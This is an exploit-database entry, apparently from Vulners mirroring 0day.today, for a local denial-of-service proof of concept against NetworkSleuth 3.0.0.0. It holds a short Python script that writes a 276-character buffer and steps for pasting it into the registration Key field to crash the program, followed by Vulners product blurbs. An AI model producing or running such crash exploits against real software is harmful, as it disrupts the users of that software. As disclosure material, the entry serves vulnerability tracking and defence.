Lucene search
K

NetworkSleuth 3.0.0.0 - Key Denial of Service Exploit

🗓️ 02 Jan 2019 00:00:00Reported by Luis MartínezType 
zdt
 zdt
🔗 0day.today👁 27 Views

Exploit for NetworkSleuth 3.0.0.0 causing Denial of Service through specific steps.

Code
# Exploit Title: NetworkSleuth 3.0.0.0 - 'Key' Denial of Service (PoC)
# Discovery by: Luis Martinez
# Vendor Homepage: www.nsauditor.com
# Software Link : http://www.nsauditor.com/downloads/networksleuth_setup.exe
# Tested Version: 3.0.0.0
# Vulnerability Type: Denial of Service (DoS) Local
# Tested on OS: Windows 10 Pro x64 es

# Steps to Produce the Crash: 
# 1.- Run python code : python NetworkSleuth_3.0.0.0.py
# 2.- Open NetworkSleuth_3.0.0.0.txt and copy content to clipboard
# 3.- Open NetworkSleuth
# 4.- Register -> Enter Registration Code...
# 5.- Name: -> l4m5
# 6.- Paste ClipBoard on "Key:"
# 7.- OK
# 8.- Crashed

#!/usr/bin/env python
 
buffer = "\x41" * 276
f = open ("NetworkSleuth_3.0.0.0.txt", "w")
f.write(buffer)
f.close()

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation